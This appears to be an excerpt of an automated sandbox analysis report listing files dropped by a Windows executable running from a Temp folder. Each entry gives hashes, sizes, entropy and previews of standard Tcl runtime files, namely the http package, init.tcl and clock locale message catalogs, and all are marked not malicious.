                                                                                                                                                                                                                                                    SSDEEP:192:kQkH8VqqNg5PPx7GRpoMJesrCL2coOG0vARQVSDR6VrKj7vWQYQ7r1QvLbDPv:pVqeglpu6toO3ACUpGv
                                                                                                                                                                                                                                                    MD5:36AB75BA723A2EEE692A2C518DAAA739
                                                                                                                                                                                                                                                    SHA1:1FB133F5E012F36BFBAAFD836E9F689FB82FFAC3
                                                                                                                                                                                                                                                    SHA-256:88220B059956D3F331B29C514F0D4AD77FBD840EFB27F0C2621510800A9B9094
                                                                                                                                                                                                                                                    SHA-512:24087FCD75C51280722AE64564F28934101F99F568CB5230D91517643D43DAC16E0462DE5FC967BF8CC0CC71708D6C47B9D9986FB21964D0B1EA6016E4C10D23
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# http.tcl.# Client-side HTTP for GET, POST, and HEAD commands..# These routines can be used in untrusted code that uses the Safesock.# security policy..# These procedures use a callback interface to avoid using vwait,.# which is not defined in the safe base..#.# See the http.n man page for documentation..package provide http 1.0..array set http {. -accept */*. -proxyhost {}. -proxyport {}. -useragent {Tcl http client package 1.0}. -proxyfilter httpProxyRequired.}.proc http_config {args} {. global http. set options [lsort [array names http -*]]. set usage [join $options ", "]. if {[llength $args] == 0} {..set result {}..foreach name $options {.. lappend result $name $http($name)..}..return $result. }. regsub -all -- - $options {} options. set pat ^-([join $options |])$. if {[llength $args] == 1} {..set flag [lindex $args 0]..if {[regexp -- $pat $flag]} {.. return $http($flag)..} else {.. return -code error "Unknown option $flag, must be:
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):735
                                                                                                                                                                                                                                                    Entropy (8bit):4.669068874824871
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:jHxxYRs+opS42wyGlTajUA43KXks4L57+HkuRz20JSv6C3l5kl:bbYRshS42wyGlTah9XkbL5i1z2jxXkl
                                                                                                                                                                                                                                                    MD5:10EC7CD64CA949099C818646B6FAE31C
                                                                                                                                                                                                                                                    SHA1:6001A58A0701DFF225E2510A4AAEE6489A537657
                                                                                                                                                                                                                                                    SHA-256:420C4B3088C9DACD21BC348011CAC61D7CB283B9BEE78AE72EED764AB094651C
                                                                                                                                                                                                                                                    SHA-512:34A0ACB689E430ED2903D8A903D531A3D734CB37733EF13C5D243CB9F59C020A3856AAD98726E10AD7F4D67619A3AF1018F6C3E53A6E073E39BD31D088EFD4AF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Tcl package index file, version 1.0.# This file is generated by the "pkg_mkIndex" command.# and sourced either when an application starts up or.# by a "package unknown" script. It invokes the.# "package ifneeded" command to set up package-related.# information so that packages will be loaded automatically.# in response to "package require" commands. When this.# script is sourced, the variable $dir must contain the.# full path name of this file's directory...package ifneeded http 1.0 [list tclPkgSetup $dir http 1.0 {{http.tcl source {httpCopyDone httpCopyStart httpEof httpEvent httpFinish httpMapReply httpProxyRequired http_code http_config http_data http_formatQuery http_get http_reset http_size http_status http_wait}}}].
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):24873
                                                                                                                                                                                                                                                    Entropy (8bit):4.82316274746826
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:QOD8Ud4JkabmvmsyulMOFt/9IrOBWq8oXCQyfp125aab07:7Dn4JkGmvbh/9IrOOoXq8aV7
                                                                                                                                                                                                                                                    MD5:77A6D49BF79B449596AD9CE0E73E116B
                                                                                                                                                                                                                                                    SHA1:8CC4F2AAC6B69ED6630DF5EB610946731483F178
                                                                                                                                                                                                                                                    SHA-256:21A5AAD2ED6D69E15C032BE72DA55DCCA8B56580C869E863D87CAF2848E5C2B1
                                                                                                                                                                                                                                                    SHA-512:F4052C342D73A2492263470E06B803DDC26C3485ADAB1163F5E00115ECCF9036599AA45386B8ACF0B4B13A698DE4A6E951D9EC67CBA316F26009617899328680
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# init.tcl --.#.# Default system startup file for Tcl-based applications. Defines.# "unknown" procedure and auto-load facilities..#.# Copyright (c) 1991-1993 The Regents of the University of California..# Copyright (c) 1994-1996 Sun Microsystems, Inc..# Copyright (c) 1998-1999 Scriptics Corporation..# Copyright (c) 2004 by Kevin B. Kenny. All rights reserved..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# This test intentionally written in pre-7.5 Tcl.if {[info commands package] == ""} {. error "version mismatch: library\nscripts expect Tcl version 7.5b1 or later but the loaded version is\nonly [info patchlevel]".}.package require -exact Tcl 8.5.19..# Compute the auto path to use in this interpreter..# The values on the path come from several locations:.#.# The environment variable TCLLIBPATH.#.# tcl_library, which is the directory containing this init.tcl script..# [tclInit] (Tcl_Init()) se
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):989
                                                                                                                                                                                                                                                    Entropy (8bit):4.015702624322247
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:4EnLzu8wcm2NkKcmtH3WhvdfjESBToOqepFHvFgdF69dixmem1OMVjeza6O6c:4azu8DtkN3bbJ75pF9gG3U2e+gc
                                                                                                                                                                                                                                                    MD5:3A3B4D3B137E7270105DC7B359A2E5C2
                                                                                                                                                                                                                                                    SHA1:2089B3948F11EF8CE4BD3D57167715ADE65875E9
                                                                                                                                                                                                                                                    SHA-256:2981965BD23A93A09EB5B4A334ACB15D00645D645C596A5ECADB88BFA0B6A908
                                                                                                                                                                                                                                                    SHA-512:044602E7228D2CB3D0A260ADFD0D3A1F7CAB7EFE5DD00C7519EAF00A395A48A46EEFDB3DE81902D420D009B137030BC98FF32AD97E9C3713F0990FE6C09887A2
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset af DAYS_OF_WEEK_ABBREV [list \. "So"\. "Ma"\. "Di"\. "Wo"\. "Do"\. "Vr"\. "Sa"]. ::msgcat::mcset af DAYS_OF_WEEK_FULL [list \. "Sondag"\. "Maandag"\. "Dinsdag"\. "Woensdag"\. "Donderdag"\. "Vrydag"\. "Saterdag"]. ::msgcat::mcset af MONTHS_ABBREV [list \. "Jan"\. "Feb"\. "Mar"\. "Apr"\. "Mei"\. "Jun"\. "Jul"\. "Aug"\. "Sep"\. "Okt"\. "Nov"\. "Des"\. ""]. ::msgcat::mcset af MONTHS_FULL [list \. "Januarie"\. "Februarie"\. "Maart"\. "April"\. "Mei"\. "Junie"\. "Julie"\. "Augustus"\. "September"\. "Oktober"\. "November"\. "Desember"\. ""]. ::msgcat::mcset af AM "VM". ::msgcat::mcset af PM "NM".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.879621059534584
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmouFygvNLouFqF3v6aZouFy9+3vR6HK:4EnLzu8YAgvNTYF3v6axAI3voq
                                                                                                                                                                                                                                                    MD5:27C356DF1BED4B22DFA55835115BE082
                                                                                                                                                                                                                                                    SHA1:677394DF81CDBAF3D3E735F4977153BB5C81B1A6
                                                                                                                                                                                                                                                    SHA-256:3C2F5F631ED3603EF0D5BCB31C51B2353C5C27839C806A036F3B7007AF7F3DE8
                                                                                                                                                                                                                                                    SHA-512:EE88348C103382F91F684A09F594177119960F87E58C5E4FC718C698AD436E332B74B8ED18DF8563F736515A3A6442C608EBCBE6D1BD13B3E3664E1AA3851076
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset af_ZA DATE_FORMAT "%d %B %Y". ::msgcat::mcset af_ZA TIME_FORMAT_12 "%l:%M:%S %P". ::msgcat::mcset af_ZA DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1964
                                                                                                                                                                                                                                                    Entropy (8bit):4.417722751563065
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8fnkFewadQxvbkMPm/FiUoAwonC9UFsvSnvMq:46dw/L+C9cKSvF
                                                                                                                                                                                                                                                    MD5:0A88A6BFF15A6DABAAE48A78D01CFAF1
                                                                                                                                                                                                                                                    SHA1:90834BCBDA9B9317B92786EC89E20DCF1F2DBD22
                                                                                                                                                                                                                                                    SHA-256:BF984EC7CF619E700FE7E00381FF58ABE9BD2F4B3DD622EB2EDACCC5E6681050
                                                                                                                                                                                                                                                    SHA-512:85CB96321BB6FB3119D69540B9E76916F0C5F534BA01382E73F8F9A0EE67A7F1BFC39947335688F2C8F3DB9B51D969D8EA7C7104A035C0E949E8E009D4656288
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ar DAYS_OF_WEEK_ABBREV [list \. "\u062d"\. "\u0646"\. "\u062b"\. "\u0631"\. "\u062e"\. "\u062c"\. "\u0633"]. ::msgcat::mcset ar DAYS_OF_WEEK_FULL [list \. "\u0627\u0644\u0623\u062d\u062f"\. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\. "\u0627\u0644\u062e\u0645\u064a\u0633"\. "\u0627\u0644\u062c\u0645\u0639\u0629"\. "\u0627\u0644\u0633\u0628\u062a"]. ::msgcat::mcset ar MONTHS_ABBREV [list \. "\u064a\u0646\u0627"\. "\u0641\u0628\u0631"\. "\u0645\u0627\u0631"\. "\u0623\u0628\u0631"\. "\u0645\u0627\u064a"\. "\u064a\u0648\u0646"\. "\u064a\u0648\u0644"\. "\u0623\u063a\u0633"\. "\u0633\u0628\u062a"\. "\u0623\u0643\u062a"\
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):259
                                                                                                                                                                                                                                                    Entropy (8bit):4.825452591398057
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmoKNvf/NLoKU3v6xH5oKNo+3vfXM6PYv:4EnLzu8yvf/Nq3v6vF3vfc6q
                                                                                                                                                                                                                                                    MD5:EEB42BA91CC7EF4F89A8C1831ABE7B03
                                                                                                                                                                                                                                                    SHA1:74D12B4CBCDF63FDF00E589D8A604A5C52C393EF
                                                                                                                                                                                                                                                    SHA-256:29A70EAC43B1F3AA189D8AE4D92658E07783965BAE417FB66EE5F69CFCB564F3
                                                                                                                                                                                                                                                    SHA-512:6CCB2F62986CE1CF3CE78538041A0E4AAF717496F965D73014A13E9B05093EB43185C3C14212DC052562F3F369AB6985485C8C93D1DFC60CF9B8DABEA7CDF434
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ar_IN DATE_FORMAT "%A %d %B %Y". ::msgcat::mcset ar_IN TIME_FORMAT_12 "%I:%M:%S %z". ::msgcat::mcset ar_IN DATE_TIME_FORMAT "%A %d %B %Y %I:%M:%S %z %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1812
                                                                                                                                                                                                                                                    Entropy (8bit):4.023830561129656
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8J5Fe6k+wR+9Gb+Oa+UcP+wR+9Gb+Oa+UD:46I6CNbtdNbQ
                                                                                                                                                                                                                                                    MD5:4338BD4F064A6CDC5BFED2D90B55D4E8
                                                                                                                                                                                                                                                    SHA1:709717BB1F62A71E94D61056A70660C6A03B48AE
                                                                                                                                                                                                                                                    SHA-256:78116E7E706C7D1E3E7446094709819FB39A50C2A2302F92D6A498E06ED4A31B
                                                                                                                                                                                                                                                    SHA-512:C63A535AD19CBEF5EFC33AC5A453B1C503A59C6CE71A4CABF8083BC516DF0F3F14D3D4F309D33EDF2EC5E79DB00ED1F7D56FD21068F09F178BB2B191603BAC25
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ar_JO DAYS_OF_WEEK_ABBREV [list \. "\u0627\u0644\u0623\u062d\u062f"\. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\. "\u0627\u0644\u062e\u0645\u064a\u0633"\. "\u0627\u0644\u062c\u0645\u0639\u0629"\. "\u0627\u0644\u0633\u0628\u062a"]. ::msgcat::mcset ar_JO MONTHS_ABBREV [list \. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\. "\u0634\u0628\u0627\u0637"\. "\u0622\u0630\u0627\u0631"\. "\u0646\u064a\u0633\u0627\u0646"\. "\u0646\u0648\u0627\u0631"\. "\u062d\u0632\u064a\u0631\u0627\u0646"\. "\u062a\u0645\u0648\u0632"\. "\u0622\u0628"\. "\u0623\u064a\u0644\u0648\u0644"\. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u0644"\. "\u062a\
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1812
                                                                                                                                                                                                                                                    Entropy (8bit):4.020656526954981
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu865Fehk+wR+9Gb+Oa+UXP+wR+9Gb+Oa+UD:46nhCNbadNbQ
                                                                                                                                                                                                                                                    MD5:3789E03CF926D4F12AFD30FC7229B78D
                                                                                                                                                                                                                                                    SHA1:AEF38AAB736E5434295C72C14F38033AAFE6EF15
                                                                                                                                                                                                                                                    SHA-256:7C970EFEB55C53758143DF42CC452A3632F805487CA69DB57E37C1F478A7571B
                                                                                                                                                                                                                                                    SHA-512:C9172600703337EDB2E36D7470A3AED96CCC763D7163067CB19E7B097BB7877522758C3109E31D5D72F486DD50BF510DDBA50EDD248B899FA0A2EEF09FCBF903
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ar_LB DAYS_OF_WEEK_ABBREV [list \. "\u0627\u0644\u0623\u062d\u062f"\. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\. "\u0627\u0644\u062e\u0645\u064a\u0633"\. "\u0627\u0644\u062c\u0645\u0639\u0629"\. "\u0627\u0644\u0633\u0628\u062a"]. ::msgcat::mcset ar_LB MONTHS_ABBREV [list \. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\. "\u0634\u0628\u0627\u0637"\. "\u0622\u0630\u0627\u0631"\. "\u0646\u064a\u0633\u0627\u0646"\. "\u0646\u0648\u0627\u0631"\. "\u062d\u0632\u064a\u0631\u0627\u0646"\. "\u062a\u0645\u0648\u0632"\. "\u0622\u0628"\. "\u0623\u064a\u0644\u0648\u0644"\. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u0644"\. "\u062a\
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1812
                                                                                                                                                                                                                                                    Entropy (8bit):4.02203966019266
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8k5Fezk+wR+9Gb+Oa+U5P+wRa9Gb+Oa+UD:46ZzCNb0d5bQ
                                                                                                                                                                                                                                                    MD5:EC736BFD4355D842E5BE217A7183D950
                                                                                                                                                                                                                                                    SHA1:C6B83C02F5D4B14064D937AFD8C6A92BA9AE9EFB
                                                                                                                                                                                                                                                    SHA-256:AEF17B94A0DB878E2F0FB49D982057C5B663289E3A8E0E2B195DCEC37E8555B1
                                                                                                                                                                                                                                                    SHA-512:68BB7851469C24003A9D74FC7FE3599A2E95EE3803014016DDEBF4C5785F49EDBADA69CD4103F2D3B6CE91E9A32CC432DBDFEC2AED0557E5B6B13AED489A1EDA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ar_SY DAYS_OF_WEEK_ABBREV [list \. "\u0627\u0644\u0623\u062d\u062f"\. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\. "\u0627\u0644\u062e\u0645\u064a\u0633"\. "\u0627\u0644\u062c\u0645\u0639\u0629"\. "\u0627\u0644\u0633\u0628\u062a"]. ::msgcat::mcset ar_SY MONTHS_ABBREV [list \. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\. "\u0634\u0628\u0627\u0637"\. "\u0622\u0630\u0627\u0631"\. "\u0646\u064a\u0633\u0627\u0646"\. "\u0646\u0648\u0627\u0631"\. "\u062d\u0632\u064a\u0631\u0627\u0646"\. "\u062a\u0645\u0648\u0632"\. "\u0622\u0628"\. "\u0623\u064a\u0644\u0648\u0644"\. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u0644"\. "\u062a\
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2105
                                                                                                                                                                                                                                                    Entropy (8bit):4.215818273236158
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:46dJRQPQ86AK0xQuEQS3oQsDptuCrQICZmQ8ZVDtN1QFqQLtCSjZMpktvp:hdP6HIZoFnl1Rgx
                                                                                                                                                                                                                                                    MD5:1A3ABFBC61EF757B45FF841C197BB6C3
                                                                                                                                                                                                                                                    SHA1:74D623DAB6238D05C18DDE57FC956D84974FC2D4
                                                                                                                                                                                                                                                    SHA-256:D790E54217A4BF9A7E1DCB4F3399B5861728918E93CD3F00B63F1349BDB71C57
                                                                                                                                                                                                                                                    SHA-512:154D053410AA0F7817197B7EE1E8AE839BA525C7660620581F228477B1F5B972FE95A4E493BB50365D0B63B0115036DDE54A98450CA4E8048AF5D0AF092BADE5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset be DAYS_OF_WEEK_ABBREV [list \. "\u043d\u0434"\. "\u043f\u043d"\. "\u0430\u0442"\. "\u0441\u0440"\. "\u0447\u0446"\. "\u043f\u0442"\. "\u0441\u0431"]. ::msgcat::mcset be DAYS_OF_WEEK_FULL [list \. "\u043d\u044f\u0434\u0437\u0435\u043b\u044f"\. "\u043f\u0430\u043d\u044f\u0434\u0437\u0435\u043b\u0430\u043a"\. "\u0430\u045e\u0442\u043e\u0440\u0430\u043a"\. "\u0441\u0435\u0440\u0430\u0434\u0430"\. "\u0447\u0430\u0446\u0432\u0435\u0440"\. "\u043f\u044f\u0442\u043d\u0456\u0446\u0430"\. "\u0441\u0443\u0431\u043e\u0442\u0430"]. ::msgcat::mcset be MONTHS_ABBREV [list \. "\u0441\u0442\u0434"\. "\u043b\u044e\u0442"\. "\u0441\u043a\u0432"\. "\u043a\u0440\u0441"\. "\u043c\u0430\u0439"\. "\u0447\u0440\u0432"\. "\u043b\u043f\u043d"\. "\u0436\u043d\u
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1819
                                                                                                                                                                                                                                                    Entropy (8bit):4.363233187157474
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:46scAXuQfuQVoQAWN5EPIKfD8WQjQ3QgQaQLSqQsQGtQWCQMmt1f:hD/zQaPIKfTSiF3KVfVCqp
                                                                                                                                                                                                                                                    MD5:11FA3BA30A0EE6A7B2B9D67B439C240D
                                                                                                                                                                                                                                                    SHA1:EC5557A16A0293ABF4AA8E5FD50940B60A8A36A6
                                                                                                                                                                                                                                                    SHA-256:E737D8DC724AA3B9EC07165C13E8628C6A8AC1E80345E10DC77E1FC62A6D86F1
                                                                                                                                                                                                                                                    SHA-512:B776E7C98FB819436C61665206EE0A2644AA4952D739FF7CC58EAFBD549BD1D26028DE8E11B8533814102B31FC3884F95890971F547804BCAA4530E35BDD5CFD
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset bg DAYS_OF_WEEK_ABBREV [list \. "\u041d\u0434"\. "\u041f\u043d"\. "\u0412\u0442"\. "\u0421\u0440"\. "\u0427\u0442"\. "\u041f\u0442"\. "\u0421\u0431"]. ::msgcat::mcset bg DAYS_OF_WEEK_FULL [list \. "\u041d\u0435\u0434\u0435\u043b\u044f"\. "\u041f\u043e\u043d\u0435\u0434\u0435\u043b\u043d\u0438\u043a"\. "\u0412\u0442\u043e\u0440\u043d\u0438\u043a"\. "\u0421\u0440\u044f\u0434\u0430"\. "\u0427\u0435\u0442\u0432\u044a\u0440\u0442\u044a\u043a"\. "\u041f\u0435\u0442\u044a\u043a"\. "\u0421\u044a\u0431\u043e\u0442\u0430"]. ::msgcat::mcset bg MONTHS_ABBREV [list \. "I"\. "II"\. "III"\. "IV"\. "V"\. "VI"\. "VII"\. "VIII"\. "IX"\. "X"\. "XI"\. "XII"\. ""]. ::msgcat::mcset bg MONTHS_FULL [list \. "\u042
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2286
                                                                                                                                                                                                                                                    Entropy (8bit):4.04505151160981
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8adWa9tUEVcqVc5VcaUTVcHVEVc+7VclEVcNGVcn0VcMG/0VcMjVcMK7YXs+:46C07LetHigetH1YES
                                                                                                                                                                                                                                                    MD5:B387D4A2AB661112F2ABF57CEDAA24A5
                                                                                                                                                                                                                                                    SHA1:80DB233687A9314600317AD39C01466C642F3C4C
                                                                                                                                                                                                                                                    SHA-256:297D4D7CAE6E99DB3CA6EE793519512BFF65013CF261CF90DED4D28D3D4F826F
                                                                                                                                                                                                                                                    SHA-512:450BB56198AAAB2EEFCD4E24C29DD79D71D2EF7E8D066F3B58F9C5D831F960AFB78C46ECE2DB32EF81454BCCC80C730E36A610DC9BAF06757E0757B421BACB19
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset bn DAYS_OF_WEEK_ABBREV [list \. "\u09b0\u09ac\u09bf"\. "\u09b8\u09cb\u09ae"\. "\u09ae\u0999\u0997\u09b2"\. "\u09ac\u09c1\u09a7"\. "\u09ac\u09c3\u09b9\u09b8\u09cd\u09aa\u09a4\u09bf"\. "\u09b6\u09c1\u0995\u09cd\u09b0"\. "\u09b6\u09a8\u09bf"]. ::msgcat::mcset bn DAYS_OF_WEEK_FULL [list \. "\u09b0\u09ac\u09bf\u09ac\u09be\u09b0"\. "\u09b8\u09cb\u09ae\u09ac\u09be\u09b0"\. "\u09ae\u0999\u0997\u09b2\u09ac\u09be\u09b0"\. "\u09ac\u09c1\u09a7\u09ac\u09be\u09b0"\. "\u09ac\u09c3\u09b9\u09b8\u09cd\u09aa\u09a4\u09bf\u09ac\u09be\u09b0"\. "\u09b6\u09c1\u0995\u09cd\u09b0\u09ac\u09be\u09b0"\. "\u09b6\u09a8\u09bf\u09ac\u09be\u09b0"]. ::msgcat::mcset bn MONTHS_ABBREV [list \. "\u099c\u09be\u09a8\u09c1\u09df\u09be\u09b0\u09c0"\. "\u09ab\u09c7\u09ac\u09cd\u09b0\u09c1\u09df\u09be\u09b0\u09c0"\.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):259
                                                                                                                                                                                                                                                    Entropy (8bit):4.821338044395148
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmovtvflD/Lo/E3v6xH5ovto+3vflm6PYv:4EnLzu81tvflD/SE3v6etF3vflm6q
                                                                                                                                                                                                                                                    MD5:764E70363A437ECA938DEC17E615608B
                                                                                                                                                                                                                                                    SHA1:2296073AE8CC421780E8A3BCD58312D6FB2F5BFC
                                                                                                                                                                                                                                                    SHA-256:7D3A956663C529D07C8A9610414356DE717F3A2A2CE9B331B052367270ACEA94
                                                                                                                                                                                                                                                    SHA-512:4C7B9082DA9DDF07C2BE16C359A1A42834B8E730AD4DD5B987866C2CC735402DDE513588A89C8DFA25A1AC6F66AF9FDDBEA8FD500F8526C4641BBA7011CD0D28
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset bn_IN DATE_FORMAT "%A %d %b %Y". ::msgcat::mcset bn_IN TIME_FORMAT_12 "%I:%M:%S %z". ::msgcat::mcset bn_IN DATE_TIME_FORMAT "%A %d %b %Y %I:%M:%S %z %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1102
                                                                                                                                                                                                                                                    Entropy (8bit):4.213250101046006
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8WBVUUQ48wsF0nuLsCtJeUFqwv1v3:46BwoL5ScfR3
                                                                                                                                                                                                                                                    MD5:9378A5AD135137759D46A7CC4E4270E0
                                                                                                                                                                                                                                                    SHA1:8D2D53DA208BB670A335C752DFC4B4FF4509A799
                                                                                                                                                                                                                                                    SHA-256:14FF564FAB584571E954BE20D61C2FACB096FE2B3EF369CC5ECB7C25C2D92D5A
